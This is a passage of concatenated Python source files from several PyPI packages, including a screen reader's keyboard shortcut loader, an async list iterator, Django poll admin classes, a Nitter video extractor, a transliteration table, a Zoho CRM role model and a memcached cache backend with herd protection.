self.env['runtime']['debug'].writeDebugOut("currShortcut " + str(shortcut) ,debug.debugLevel.INFO)
return str(shortcut)
def currKeyIsModifier(self):
if len(self.getLastDeepestInput()) != 1:
return False
return (self.env['input']['currInput'][0] =='KEY_FENRIR') or (self.env['input']['currInput'][0] == 'KEY_SCRIPT')
def isFenrirKey(self, eventName):
return eventName in self.env['input']['fenrirKey']
def isScriptKey(self, eventName):
return eventName in self.env['input']['scriptKey']
def getCommandForShortcut(self, shortcut):
if not self.shortcutExists(shortcut):
return ''
return self.env['bindings'][shortcut]
def shortcutExists(self, shortcut):
return(shortcut in self.env['bindings'])
def loadShortcuts(self, kbConfigPath=fenrirPath + '/../../config/keyboard/desktop.conf'):
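        # Each binding line has the form 'KEY[,KEY...]=COMMAND'; an integer among the keys sets the required tap count (shortcutRepeat).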
kbConfig = open(kbConfigPath,"r")
while(True):
invalid = False
line = kbConfig.readline()
if not line:
break
line = line.replace('\n','')
if line.replace(" ","") == '':
continue
if line.replace(" ","").startswith("#"):
continue
if line.count("=") != 1:
continue
sepLine = line.split('=')
commandName = sepLine[1].upper()
sepLine[0] = sepLine[0].replace(" ","")
sepLine[0] = sepLine[0].replace("'","")
sepLine[0] = sepLine[0].replace('"',"")
keys = sepLine[0].split(',')
shortcutKeys = []
shortcutRepeat = 1
shortcut = []
for key in keys:
try:
shortcutRepeat = int(key)
except:
if not self.isValidKey(key.upper()):
self.env['runtime']['debug'].writeDebugOut("invalid key : "+ key.upper() + ' command:' +commandName ,debug.debugLevel.WARNING)
invalid = True
break
shortcutKeys.append(key.upper())
if invalid:
continue
shortcut.append(shortcutRepeat)
shortcut.append(sorted(shortcutKeys))
            if len(shortcutKeys) != 1 and 'KEY_FENRIR' not in shortcutKeys:
self.env['runtime']['debug'].writeDebugOut("invalid shortcut (missing KEY_FENRIR): "+ str(shortcut) + ' command:' +commandName ,debug.debugLevel.ERROR)
continue
self.env['runtime']['debug'].writeDebugOut("Shortcut: "+ str(shortcut) + ' command:' +commandName ,debug.debugLevel.INFO, onAnyLevel=True)
self.env['bindings'][str(shortcut)] = commandName
kbConfig.close()
# fix bindings
self.env['bindings'][str([1, ['KEY_F1', 'KEY_FENRIR']])] = 'TOGGLE_TUTORIAL_MODE'
def isValidKey(self, key):
return key in inputData.keyNames | PypiClean |
/dataone.libclient-3.5.2-py3-none-any.whl/d1_client/aio/iter/base_async.py | """Base for Async ObjectList and EventLog Iterator.
"""
import asyncio
import logging
import d1_common.types.exceptions
import d1_client.aio.async_client
PAGE_SIZE_ERROR_STR = """
The remote node returned a result page that contains fewer than the
requested number of records. As pages are downloaded concurrently by
this iterator, it cannot compensate. To ensure that all objects are
found by the iterator, switch to the traditional synchronous
version of this iterator. To skip this check, create the iterator with
ignore_errors=True. If using a command line client, start the client
with the --ignore-errors switch.
"""
class IteratorBaseAsync(object):
def __init__(
self,
async_client,
page_size=d1_client.aio.async_client.DEFAULT_PAGE_SIZE,
list_arg_dict=None,
):
self.log = logging.getLogger(__name__)
self.async_client = async_client
self.page_size = page_size
self.list_arg_dict = list_arg_dict or {}
self._total = None
self.task_set = set()
self.another_task_set = set()
self.result_set = set()
self.ignore_errors = False
async def __aiter__(self):
"""Async iterator returning pyxb objects."""
await self.import_all()
while self.task_set or self.another_task_set or self.result_set:
self.log.debug(
"task_set={} another_task_set={} result_set={}".format(
len(self.task_set), len(self.another_task_set), len(self.result_set)
)
)
if not self.result_set:
await self.await_task()
continue
yield self.result_set.pop()
@property
async def total(self):
if self._total is None:
self._total = await self.get_total_count()
return self._total
def calc_page_count(self, total_count):
n_pages = (total_count - 1) // self.page_size + 1
return n_pages
# Async tasks
async def add_task(self, task_func):
if len(self.task_set) >= self.async_client.max_concurrent:
await self.await_task()
self.task_set.add(task_func)
async def await_task(self):
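        # Rotate freshly added tasks into the pending set, wait for at least one to finish, and re-raise any task exception unless ignore_errors is set.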
self.another_task_set.update(self.task_set)
self.task_set.clear()
result_set, new_task_set = await asyncio.wait(
self.another_task_set, return_when=asyncio.FIRST_COMPLETED
)
self.another_task_set = new_task_set
for r in result_set:
try:
# Raise any exception that occurred in task.
r.result()
except Exception as e:
if self.ignore_errors:
self.log.debug(
"Continuing after error (ignore_errors=True): {}".format(str(e))
)
else:
self.log.exception("Iterator error:")
raise
async def await_all(self):
while self.task_set or self.another_task_set:
await self.await_task()
def _page_check(self, page_idx, page_count, received_page_size):
self.log.debug(
"page_idx={} page_count={} received_page_size={} requested_page_size={}".format(
page_idx, page_count, received_page_size, self.page_size
)
)
if (
(not self.ignore_errors)
and page_idx < page_count - 1
and received_page_size != self.page_size
):
raise d1_common.types.exceptions.ServiceFailure(
0,
"{} page_idx={} page_count={} received_page_size={} requested_page_size={}".format(
PAGE_SIZE_ERROR_STR.strip(),
page_idx,
page_count,
received_page_size,
self.page_size,
),
)
# Override
async def import_all(self):
raise NotImplementedError
async def import_page(self, page_idx, page_count):
raise NotImplementedError
async def get_total_count(self):
raise NotImplementedError | PypiClean |
/opps-polls-0.1.6.tar.gz/opps-polls-0.1.6/opps/polls/admin.py | from django.contrib import admin
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from .models import (Poll, Choice, PollPost, PollBox,
PollBoxPolls, PollConfig)
from opps.core.admin import PublishableAdmin
from opps.core.admin import apply_opps_rules
from redactor.widgets import RedactorEditor
from opps.images.generate import image_url
class PollAdminForm(forms.ModelForm):
class Meta:
model = Poll
widgets = {"headline": RedactorEditor()}
class ChoiceInline(admin.TabularInline):
model = Choice
fk_name = 'poll'
raw_id_fields = ['image']
    actions = None
extra = 1
fieldsets = [(None, {'fields': ('choice', ('image', 'image_thumb'), 'order', 'votes')})]
readonly_fields = ['image_thumb']
def image_thumb(self, obj):
if obj.image:
return u'<img width="60px" height="60px" src="{0}" />'.format(
image_url(obj.image.image.url, width=60, height=60))
return _(u'No Image')
image_thumb.short_description = _(u'Thumbnail')
image_thumb.allow_tags = True
class PollPostInline(admin.TabularInline):
model = PollPost
fk_name = 'poll'
raw_id_fields = ['post']
actions = None
extra = 1
classes = ('collapse',)
@apply_opps_rules('polls')
class PollAdmin(PublishableAdmin):
form = PollAdminForm
prepopulated_fields = {"slug": ["question"]}
list_display = ['question', 'channel', 'date_available',
'date_end', 'published', 'preview_url']
list_filter = ["date_end", "date_available", "published", "channel"]
search_fields = ["question", "headline"]
exclude = ('user',)
raw_id_fields = ['main_image', 'channel']
inlines = [ChoiceInline, PollPostInline]
readonly_fields = ['image_thumb']
fieldsets = (
(_(u'Identification'), {
'fields': ('site', 'question', 'slug')}),
(_(u'Content'), {
'fields': ('headline', ('main_image', 'image_thumb'), 'tags')}),
(_(u'Relationships'), {
'fields': ('channel',)}),
(_(u'Publication'), {
'classes': ('extrapretty'),
'fields': ('published', ('date_available', 'date_end'),
'order', 'multiple_choices', ('min_multiple_choices',
'max_multiple_choices'), 'display_choice_images',
'show_results')}),
)
class PollBoxPollsInline(admin.TabularInline):
model = PollBoxPolls
fk_name = 'pollbox'
raw_id_fields = ['poll']
actions = None
extra = 1
fieldsets = [(None, {
'classes': ('collapse',),
'fields': ('poll', 'order', 'date_available', 'date_end')})]
class PollBoxAdmin(PublishableAdmin):
prepopulated_fields = {"slug": ["name"]}
list_display = ['name', 'date_available', 'published']
list_filter = ['date_available', 'published']
inlines = [PollBoxPollsInline]
exclude = ('user',)
raw_id_fields = ['channel', 'article']
fieldsets = (
(_(u'Identification'), {
'fields': ('site', 'name', 'slug')}),
(_(u'Relationships'), {
'fields': ('channel',)}),
(_(u'Publication'), {
'classes': ('extrapretty'),
'fields': ('published', 'date_available')}),
)
def clean_ended_entries(self, request, queryset):
now = timezone.now()
for box in queryset:
ended = box.pollboxpolls_pollboxes.filter(
date_end__lt=now
)
if ended:
ended.delete()
clean_ended_entries.short_description = _(u'Clean ended polls')
actions = ('clean_ended_entries',)
class PollConfigAdmin(PublishableAdmin):
list_display = ['key', 'key_group', 'channel', 'date_insert',
'date_available', 'published']
list_filter = ["key", 'key_group', "channel", "published"]
search_fields = ["key", "key_group", "value"]
raw_id_fields = ['poll', 'channel', 'article']
exclude = ('user',)
admin.site.register(Poll, PollAdmin)
admin.site.register(PollBox, PollBoxAdmin)
admin.site.register(PollConfig, PollConfigAdmin) | PypiClean |
/haruhi_dl-2021.8.1.tar.gz/haruhi_dl-2021.8.1/haruhi_dl/extractor/nitter.py | from __future__ import unicode_literals
from .common import SelfhostedInfoExtractor
from ..utils import (
parse_count,
unified_strdate,
unified_timestamp,
remove_end,
determine_ext,
ExtractorError,
)
class NitterSHIE(SelfhostedInfoExtractor):
_VALID_URL = r'nitter:(?P<host>[^:]+):(?P<id>\d+)'
_SH_VALID_URL = r'https?://(?P<host>[^/]+)/(?P<uploader_id>.+)/status/(?P<id>[0-9]+)(?:#.)?'
_SH_VALID_CONTENT_STRINGS = (
'<meta property="og:site_name" content="Nitter" />',
'<link rel="stylesheet" type="text/css" href="/css/themes/nitter.css" />',
)
_SELFHOSTED = True
current_instance = 'nitter.nixnet.services'
_TESTS = [
{
# GIF (wrapped in mp4)
'url': 'nitter:' + current_instance + ':1314279897502629888',
'info_dict': {
'id': '1314279897502629888',
'ext': 'mp4',
'title': 'Firefox 🔥 - You know the old saying, if you see something say something. Now you actually can with the YouTube regrets extension. Report harmful YouTube recommendations so others can avoid watching them. ➡️ https://mzl.la/3iFIiyg #UnfckTheInternet',
'description': 'You know the old saying, if you see something say something. Now you actually can with the YouTube regrets extension. Report harmful YouTube recommendations so others can avoid watching them. ➡️ https://mzl.la/3iFIiyg #UnfckTheInternet',
'thumbnail': r're:^https?://.*\.jpg$',
'uploader': 'Firefox 🔥',
'uploader_id': 'firefox',
'uploader_url': 'https://' + current_instance + '/firefox',
'upload_date': '20201008',
'timestamp': 1602183720,
},
}, { # normal video
'url': 'nitter:' + current_instance + ':1299715685392756737',
'info_dict': {
'id': '1299715685392756737',
'ext': 'mp4',
'title': 're:.+ - "Je ne prédis jamais rien" D Raoult, Août 2020...',
'description': '"Je ne prédis jamais rien" D Raoult, Août 2020...',
'thumbnail': r're:^https?://.*\.jpg$',
'uploader': str,
'uploader_id': 'Le___Doc',
'uploader_url': 'https://' + current_instance + '/Le___Doc',
'upload_date': '20200829',
'timestamp': 1598711341,
'view_count': int,
'like_count': int,
'repost_count': int,
'comment_count': int,
},
}, { # video embed in a "Streaming Political Ads" box
'url': 'nitter:' + current_instance + ':1321147074491092994',
'info_dict': {
'id': '1321147074491092994',
'ext': 'mp4',
'title': "Mozilla - Are you being targeted with weird, ominous or just plain annoying political ads while streaming your favorite shows? This isn't a real political ad, but if you're watching streaming TV in the U.S., chances are you've seen quite a few. Learn more ➡️ https://mzl.la/StreamingAds",
'description': "Are you being targeted with weird, ominous or just plain annoying political ads while streaming your favorite shows? This isn't a real political ad, but if you're watching streaming TV in the U.S., chances are you've seen quite a few. Learn more ➡️ https://mzl.la/StreamingAds",
'thumbnail': r're:^https?://.*\.jpg$',
'uploader': 'Mozilla',
'uploader_id': 'mozilla',
'uploader_url': 'https://' + current_instance + '/mozilla',
'upload_date': '20201027',
'timestamp': 1603820982
},
},
]
def _selfhosted_extract(self, url, webpage=None):
host, video_id = self._match_id_and_host(url)
base_url = ('http://' if url.startswith('http://') else 'https://') + host
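        # If proxy sites are explicitly disabled, hand the tweet straight to the Twitter extractor.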
if self._downloader.params.get('use_proxy_sites') is False:
return self.url_result('https://twitter.com/i/web/status/' + video_id, ie='Twitter')
if not webpage or '>Enable hls playback<' in webpage:
if self._downloader.params.get('use_proxy_sites') is None and not url.startswith('nitter:'):
return self.url_result('https://twitter.com/i/web/status/' + video_id, ie='Twitter')
self._set_cookie(host, 'hlsPlayback', 'on')
if url.startswith('nitter:'):
url = base_url + '/hdl/status/' + video_id
webpage = self._download_webpage(url, video_id,
note='Re-downloading webpage for HLS data' if webpage else 'Downloading webpage',
expected_status=(200, 429))
if '>Instance has been rate limited.<' in webpage:
if self._downloader.params.get('use_proxy_sites') is False:
raise ExtractorError('Instance has been rate limited', expected=True)
self.report_warning('Instance has been rate limited, falling back to Twitter')
return self.url_result('https://twitter.com/i/web/status/' + video_id, ie='Twitter')
video_url = base_url + self._html_search_regex(r'(?:<video[^>]+data-url|<source[^>]+src)="([^"]+)"', webpage, 'video url')
ext = determine_ext(video_url)
if ext == 'unknown_video':
formats = self._extract_m3u8_formats(video_url, video_id, ext='mp4')
else:
formats = [{
'url': video_url,
'ext': ext
}]
title = (
self._og_search_description(webpage).replace('\n', ' ')
or self._html_search_regex(r'<div class="tweet-content[^>]+>([^<]+)</div>', webpage, 'title'))
description = title
uploader_id = self._html_search_regex(r'<a class="username"[^>]+title="@([^"]+)"', webpage, 'uploader id', fatal=False)
if uploader_id:
uploader_url = base_url + '/' + uploader_id
uploader = self._html_search_regex(r'<a class="fullname"[^>]+title="([^"]+)"', webpage, 'uploader name', fatal=False)
if uploader:
title = uploader + ' - ' + title
view_count = parse_count(self._html_search_regex(r'<span[^>]+class="icon-play[^>]*></span>\s([^<]+)</div>', webpage, 'view count', fatal=False))
like_count = parse_count(self._html_search_regex(r'<span[^>]+class="icon-heart[^>]*></span>\s([^<]+)</div>', webpage, 'like count', fatal=False))
repost_count = parse_count(self._html_search_regex(r'<span[^>]+class="icon-retweet[^>]*></span>\s([^<]+)</div>', webpage, 'repost count', fatal=False))
        comment_count = parse_count(self._html_search_regex(r'<span[^>]+class="icon-comment[^>]*></span>\s([^<]+)</div>', webpage, 'comment count', fatal=False))
thumbnail = base_url + (self._html_search_meta('og:image', webpage, 'thumbnail url')
or self._html_search_regex(r'<video[^>]+poster="([^"]+)"', webpage, 'thumbnail url', fatal=False))
thumbnail = remove_end(thumbnail, '%3Asmall') # if parsed with regex, it should contain this
thumbnails = []
thumbnail_ids = ('thumb', 'small', 'large', 'medium', 'orig')
for id in thumbnail_ids:
thumbnails.append({
'id': id,
'url': thumbnail + '%3A' + id,
})
date = self._html_search_regex(r'<span[^>]+class="tweet-date"[^>]*><a[^>]+title="([^"]+)"', webpage, 'upload date', fatal=False)
upload_date = unified_strdate(date)
timestamp = unified_timestamp(date)
return {
'id': video_id,
'title': title,
'description': description,
'uploader': uploader,
'timestamp': timestamp,
'uploader_id': uploader_id,
'uploader_url': uploader_url,
'view_count': view_count,
'like_count': like_count,
'repost_count': repost_count,
'comment_count': comment_count,
'formats': formats,
'thumbnails': thumbnails,
'thumbnail': thumbnail,
'upload_date': upload_date,
} | PypiClean |
/latin_databases-0.1.16.tar.gz/latin_databases-0.1.16/latin/unidecode2/x033.py | data = (
'apartment', # 0x00
'alpha', # 0x01
'ampere', # 0x02
'are', # 0x03
'inning', # 0x04
'inch', # 0x05
'won', # 0x06
'escudo', # 0x07
'acre', # 0x08
'ounce', # 0x09
'ohm', # 0x0a
'kai-ri', # 0x0b
'carat', # 0x0c
'calorie', # 0x0d
'gallon', # 0x0e
'gamma', # 0x0f
'giga', # 0x10
'guinea', # 0x11
'curie', # 0x12
'guilder', # 0x13
'kilo', # 0x14
'kilogram', # 0x15
'kilometer', # 0x16
'kilowatt', # 0x17
'gram', # 0x18
'gram ton', # 0x19
'cruzeiro', # 0x1a
'krone', # 0x1b
'case', # 0x1c
'koruna', # 0x1d
'co-op', # 0x1e
'cycle', # 0x1f
'centime', # 0x20
'shilling', # 0x21
'centi', # 0x22
'cent', # 0x23
'dozen', # 0x24
'desi', # 0x25
'dollar', # 0x26
'ton', # 0x27
'nano', # 0x28
'knot', # 0x29
'heights', # 0x2a
'percent', # 0x2b
'parts', # 0x2c
'barrel', # 0x2d
'piaster', # 0x2e
'picul', # 0x2f
'pico', # 0x30
'building', # 0x31
'farad', # 0x32
'feet', # 0x33
'bushel', # 0x34
'franc', # 0x35
'hectare', # 0x36
'peso', # 0x37
'pfennig', # 0x38
'hertz', # 0x39
'pence', # 0x3a
'page', # 0x3b
'beta', # 0x3c
'point', # 0x3d
'volt', # 0x3e
'hon', # 0x3f
'pound', # 0x40
'hall', # 0x41
'horn', # 0x42
'micro', # 0x43
'mile', # 0x44
'mach', # 0x45
'mark', # 0x46
'mansion', # 0x47
'micron', # 0x48
'milli', # 0x49
'millibar', # 0x4a
'mega', # 0x4b
'megaton', # 0x4c
'meter', # 0x4d
'yard', # 0x4e
'yard', # 0x4f
'yuan', # 0x50
'liter', # 0x51
'lira', # 0x52
'rupee', # 0x53
'ruble', # 0x54
'rem', # 0x55
'roentgen', # 0x56
'watt', # 0x57
'0h', # 0x58
'1h', # 0x59
'2h', # 0x5a
'3h', # 0x5b
'4h', # 0x5c
'5h', # 0x5d
'6h', # 0x5e
'7h', # 0x5f
'8h', # 0x60
'9h', # 0x61
'10h', # 0x62
'11h', # 0x63
'12h', # 0x64
'13h', # 0x65
'14h', # 0x66
'15h', # 0x67
'16h', # 0x68
'17h', # 0x69
'18h', # 0x6a
'19h', # 0x6b
'20h', # 0x6c
'21h', # 0x6d
'22h', # 0x6e
'23h', # 0x6f
'24h', # 0x70
'hPa', # 0x71
'da', # 0x72
'AU', # 0x73
'bar', # 0x74
'oV', # 0x75
'pc', # 0x76
'dm', # 0x77
'dm^2', # 0x78
'dm^3', # 0x79
'IU', # 0x7a
'Heisei', # 0x7b
'Syouwa', # 0x7c
'Taisyou', # 0x7d
'Meiji', # 0x7e
'Inc.', # 0x7f
'pA', # 0x80
'nA', # 0x81
'uA', # 0x82
'mA', # 0x83
'kA', # 0x84
'kB', # 0x85
'MB', # 0x86
'GB', # 0x87
'cal', # 0x88
'kcal', # 0x89
'pF', # 0x8a
'nF', # 0x8b
'uF', # 0x8c
'ug', # 0x8d
'mg', # 0x8e
'kg', # 0x8f
'Hz', # 0x90
'kHz', # 0x91
'MHz', # 0x92
'GHz', # 0x93
'THz', # 0x94
'ul', # 0x95
'ml', # 0x96
'dl', # 0x97
'kl', # 0x98
'fm', # 0x99
'nm', # 0x9a
'um', # 0x9b
'mm', # 0x9c
'cm', # 0x9d
'km', # 0x9e
'mm^2', # 0x9f
'cm^2', # 0xa0
'm^2', # 0xa1
'km^2', # 0xa2
'mm^3', # 0xa3
'cm^3', # 0xa4
'm^3', # 0xa5
'km^3', # 0xa6
'm/s', # 0xa7
'm/s^2', # 0xa8
'Pa', # 0xa9
'kPa', # 0xaa
'MPa', # 0xab
'GPa', # 0xac
'rad', # 0xad
'rad/s', # 0xae
'rad/s^2', # 0xaf
'ps', # 0xb0
'ns', # 0xb1
'us', # 0xb2
'ms', # 0xb3
'pV', # 0xb4
'nV', # 0xb5
'uV', # 0xb6
'mV', # 0xb7
'kV', # 0xb8
'MV', # 0xb9
'pW', # 0xba
'nW', # 0xbb
'uW', # 0xbc
'mW', # 0xbd
'kW', # 0xbe
'MW', # 0xbf
'kOhm', # 0xc0
'MOhm', # 0xc1
'a.m.', # 0xc2
'Bq', # 0xc3
'cc', # 0xc4
'cd', # 0xc5
'C/kg', # 0xc6
'Co.', # 0xc7
'dB', # 0xc8
'Gy', # 0xc9
'ha', # 0xca
'HP', # 0xcb
'in', # 0xcc
'K.K.', # 0xcd
'KM', # 0xce
'kt', # 0xcf
'lm', # 0xd0
'ln', # 0xd1
'log', # 0xd2
'lx', # 0xd3
'mb', # 0xd4
'mil', # 0xd5
'mol', # 0xd6
'pH', # 0xd7
'p.m.', # 0xd8
'PPM', # 0xd9
'PR', # 0xda
'sr', # 0xdb
'Sv', # 0xdc
'Wb', # 0xdd
'V/m', # 0xde
'A/m', # 0xdf
'1d', # 0xe0
'2d', # 0xe1
'3d', # 0xe2
'4d', # 0xe3
'5d', # 0xe4
'6d', # 0xe5
'7d', # 0xe6
'8d', # 0xe7
'9d', # 0xe8
'10d', # 0xe9
'11d', # 0xea
'12d', # 0xeb
'13d', # 0xec
'14d', # 0xed
'15d', # 0xee
'16d', # 0xef
'17d', # 0xf0
'18d', # 0xf1
'19d', # 0xf2
'20d', # 0xf3
'21d', # 0xf4
'22d', # 0xf5
'23d', # 0xf6
'24d', # 0xf7
'25d', # 0xf8
'26d', # 0xf9
'27d', # 0xfa
'28d', # 0xfb
'29d', # 0xfc
'30d', # 0xfd
'31d', # 0xfe
'gal', # 0xff
) | PypiClean |
/zohocrmsdk2_0-5.1.0.tar.gz/zohocrmsdk2_0-5.1.0/zcrmsdk/src/com/zoho/crm/api/roles/role.py | try:
from zcrmsdk.src.com.zoho.crm.api.exception import SDKException
from zcrmsdk.src.com.zoho.crm.api.util import Constants
except Exception:
from ..exception import SDKException
from ..util import Constants
class Role(object):
def __init__(self):
"""Creates an instance of Role"""
self.__display_label = None
self.__forecast_manager = None
self.__share_with_peers = None
self.__name = None
self.__description = None
self.__id = None
self.__reporting_to = None
self.__admin_user = None
self.__key_modified = dict()
def get_display_label(self):
"""
The method to get the display_label
Returns:
string: A string representing the display_label
"""
return self.__display_label
def set_display_label(self, display_label):
"""
The method to set the value to display_label
Parameters:
display_label (string) : A string representing the display_label
"""
if display_label is not None and not isinstance(display_label, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: display_label EXPECTED TYPE: str', None, None)
self.__display_label = display_label
self.__key_modified['display_label'] = 1
def get_forecast_manager(self):
"""
The method to get the forecast_manager
Returns:
User: An instance of User
"""
return self.__forecast_manager
def set_forecast_manager(self, forecast_manager):
"""
The method to set the value to forecast_manager
Parameters:
forecast_manager (User) : An instance of User
"""
try:
from zcrmsdk.src.com.zoho.crm.api.users import User
except Exception:
from ..users import User
if forecast_manager is not None and not isinstance(forecast_manager, User):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: forecast_manager EXPECTED TYPE: User', None, None)
self.__forecast_manager = forecast_manager
self.__key_modified['forecast_manager'] = 1
def get_share_with_peers(self):
"""
The method to get the share_with_peers
Returns:
bool: A bool representing the share_with_peers
"""
return self.__share_with_peers
def set_share_with_peers(self, share_with_peers):
"""
The method to set the value to share_with_peers
Parameters:
share_with_peers (bool) : A bool representing the share_with_peers
"""
if share_with_peers is not None and not isinstance(share_with_peers, bool):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: share_with_peers EXPECTED TYPE: bool', None, None)
self.__share_with_peers = share_with_peers
self.__key_modified['share_with_peers'] = 1
def get_name(self):
"""
The method to get the name
Returns:
string: A string representing the name
"""
return self.__name
def set_name(self, name):
"""
The method to set the value to name
Parameters:
name (string) : A string representing the name
"""
if name is not None and not isinstance(name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: name EXPECTED TYPE: str', None, None)
self.__name = name
self.__key_modified['name'] = 1
def get_description(self):
"""
The method to get the description
Returns:
string: A string representing the description
"""
return self.__description
def set_description(self, description):
"""
The method to set the value to description
Parameters:
description (string) : A string representing the description
"""
if description is not None and not isinstance(description, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: description EXPECTED TYPE: str', None, None)
self.__description = description
self.__key_modified['description'] = 1
def get_id(self):
"""
The method to get the id
Returns:
int: An int representing the id
"""
return self.__id
def set_id(self, id):
"""
The method to set the value to id
Parameters:
id (int) : An int representing the id
"""
if id is not None and not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
self.__id = id
self.__key_modified['id'] = 1
def get_reporting_to(self):
"""
The method to get the reporting_to
Returns:
User: An instance of User
"""
return self.__reporting_to
def set_reporting_to(self, reporting_to):
"""
The method to set the value to reporting_to
Parameters:
reporting_to (User) : An instance of User
"""
try:
from zcrmsdk.src.com.zoho.crm.api.users import User
except Exception:
from ..users import User
if reporting_to is not None and not isinstance(reporting_to, User):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: reporting_to EXPECTED TYPE: User', None, None)
self.__reporting_to = reporting_to
self.__key_modified['reporting_to'] = 1
def get_admin_user(self):
"""
The method to get the admin_user
Returns:
bool: A bool representing the admin_user
"""
return self.__admin_user
def set_admin_user(self, admin_user):
"""
The method to set the value to admin_user
Parameters:
admin_user (bool) : A bool representing the admin_user
"""
if admin_user is not None and not isinstance(admin_user, bool):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: admin_user EXPECTED TYPE: bool', None, None)
self.__admin_user = admin_user
self.__key_modified['admin_user'] = 1
def is_key_modified(self, key):
"""
The method to check if the user has modified the given key
Parameters:
key (string) : A string representing the key
Returns:
int: An int representing the modification
"""
if key is not None and not isinstance(key, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: key EXPECTED TYPE: str', None, None)
if key in self.__key_modified:
return self.__key_modified.get(key)
return None
def set_key_modified(self, key, modification):
"""
The method to mark the given key as modified
Parameters:
key (string) : A string representing the key
modification (int) : An int representing the modification
"""
if key is not None and not isinstance(key, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: key EXPECTED TYPE: str', None, None)
if modification is not None and not isinstance(modification, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: modification EXPECTED TYPE: int', None, None)
self.__key_modified[key] = modification | PypiClean |
/django-newcache-0.2.4.tar.gz/django-newcache-0.2.4/newcache.py | "Modified memcached cache backend"
import time
from threading import local
from django.core.cache.backends.base import BaseCache, InvalidCacheBackendError
from django.utils.hashcompat import sha_constructor
from django.utils.encoding import smart_str
from django.conf import settings
try:
from django.utils import importlib
except ImportError:
import importlib
try:
import pylibmc as memcache
NotFoundError = memcache.NotFound
using_pylibmc = True
except ImportError:
using_pylibmc = False
try:
import memcache
NotFoundError = ValueError
except ImportError:
raise InvalidCacheBackendError('Memcached cache backend requires ' +
'either the "pylibmc" or "memcache" library')
# Flavor is used amongst multiple apps to differentiate the "flavor" of the
# environment. Examples of flavors are 'prod', 'staging', 'dev', and 'test'.
FLAVOR = getattr(settings, 'FLAVOR', '')
CACHE_VERSION = str(getattr(settings, 'CACHE_VERSION', 1))
CACHE_BEHAVIORS = getattr(settings, 'CACHE_BEHAVIORS', {'hash': 'crc'})
CACHE_KEY_MODULE = getattr(settings, 'CACHE_KEY_MODULE', 'newcache')
CACHE_HERD_TIMEOUT = getattr(settings, 'CACHE_HERD_TIMEOUT', 60)
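# Herd ("dog-pile") mitigation: values are packed as (MARKER, value, herd_timeout) tuples.
# Once the embedded timeout passes, get() re-stores the stale value for CACHE_HERD_TIMEOUT
# seconds and reports a miss, so typically only one caller regenerates the value while
# others keep receiving the stale copy until the fresh value arrives.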
class Marker(object):
pass
MARKER = Marker()
def get_key(key):
"""
Returns a hashed, versioned, flavored version of the string that was input.
"""
hashed = sha_constructor(smart_str(key)).hexdigest()
return ''.join((FLAVOR, '-', CACHE_VERSION, '-', hashed))
key_func = importlib.import_module(CACHE_KEY_MODULE).get_key
class CacheClass(BaseCache):
def __init__(self, server, params):
super(CacheClass, self).__init__(params)
self._servers = server.split(';')
self._use_binary = bool(params.get('binary'))
self._local = local()
@property
def _cache(self):
"""
Implements transparent thread-safe access to a memcached client.
"""
client = getattr(self._local, 'client', None)
if client:
return client
# Use binary mode if it's both supported and requested
if using_pylibmc and self._use_binary:
client = memcache.Client(self._servers, binary=True)
else:
client = memcache.Client(self._servers)
# If we're using pylibmc, set the behaviors according to settings
if using_pylibmc:
client.behaviors = CACHE_BEHAVIORS
self._local.client = client
return client
def _pack_value(self, value, timeout):
"""
Packs a value to include a marker (to indicate that it's a packed
value), the value itself, and the value's timeout information.
"""
herd_timeout = (timeout or self.default_timeout) + int(time.time())
return (MARKER, value, herd_timeout)
def _unpack_value(self, value, default=None):
"""
Unpacks a value and returns a tuple whose first element is the value,
and whose second element is whether it needs to be herd refreshed.
"""
try:
marker, unpacked, herd_timeout = value
except (ValueError, TypeError):
return value, False
if not isinstance(marker, Marker):
return value, False
if herd_timeout < int(time.time()):
return unpacked, True
return unpacked, False
def _get_memcache_timeout(self, timeout):
"""
Memcached deals with long (> 30 days) timeouts in a special
way. Call this function to obtain a safe value for your timeout.
"""
if timeout is None:
timeout = self.default_timeout
if timeout > 2592000: # 60*60*24*30, 30 days
# See http://code.google.com/p/memcached/wiki/FAQ
# "You can set expire times up to 30 days in the future. After that
# memcached interprets it as a date, and will expire the item after
# said date. This is a simple (but obscure) mechanic."
#
# This means that we have to switch to absolute timestamps.
timeout += int(time.time())
return timeout
def add(self, key, value, timeout=None, herd=True):
# If the user chooses to use the herd mechanism, then encode some
# timestamp information into the object to be persisted into memcached
if herd and timeout != 0:
packed = self._pack_value(value, timeout)
real_timeout = (self._get_memcache_timeout(timeout) +
CACHE_HERD_TIMEOUT)
else:
packed = value
real_timeout = self._get_memcache_timeout(timeout)
return self._cache.add(key_func(key), packed, real_timeout)
def get(self, key, default=None):
encoded_key = key_func(key)
packed = self._cache.get(encoded_key)
if packed is None:
return default
val, refresh = self._unpack_value(packed)
# If the cache has expired according to the embedded timeout, then
# shove it back into the cache for a while, but act as if it was a
# cache miss.
if refresh:
self._cache.set(encoded_key, val,
self._get_memcache_timeout(CACHE_HERD_TIMEOUT))
return default
return val
def set(self, key, value, timeout=None, herd=True):
# If the user chooses to use the herd mechanism, then encode some
# timestamp information into the object to be persisted into memcached
if herd and timeout != 0:
packed = self._pack_value(value, timeout)
real_timeout = (self._get_memcache_timeout(timeout) +
CACHE_HERD_TIMEOUT)
else:
packed = value
real_timeout = self._get_memcache_timeout(timeout)
return self._cache.set(key_func(key), packed, real_timeout)
def delete(self, key):
self._cache.delete(key_func(key))
def get_many(self, keys):
# First, map all of the keys through our key function
rvals = map(key_func, keys)
packed_resp = self._cache.get_multi(rvals)
resp = {}
reinsert = {}
for key, packed in packed_resp.iteritems():
# If it was a miss, treat it as a miss to our response & continue
if packed is None:
resp[key] = packed
continue
val, refresh = self._unpack_value(packed)
if refresh:
reinsert[key] = val
resp[key] = None
else:
resp[key] = val
# If there are values to re-insert for a short period of time, then do
# so now.
if reinsert:
self._cache.set_multi(reinsert,
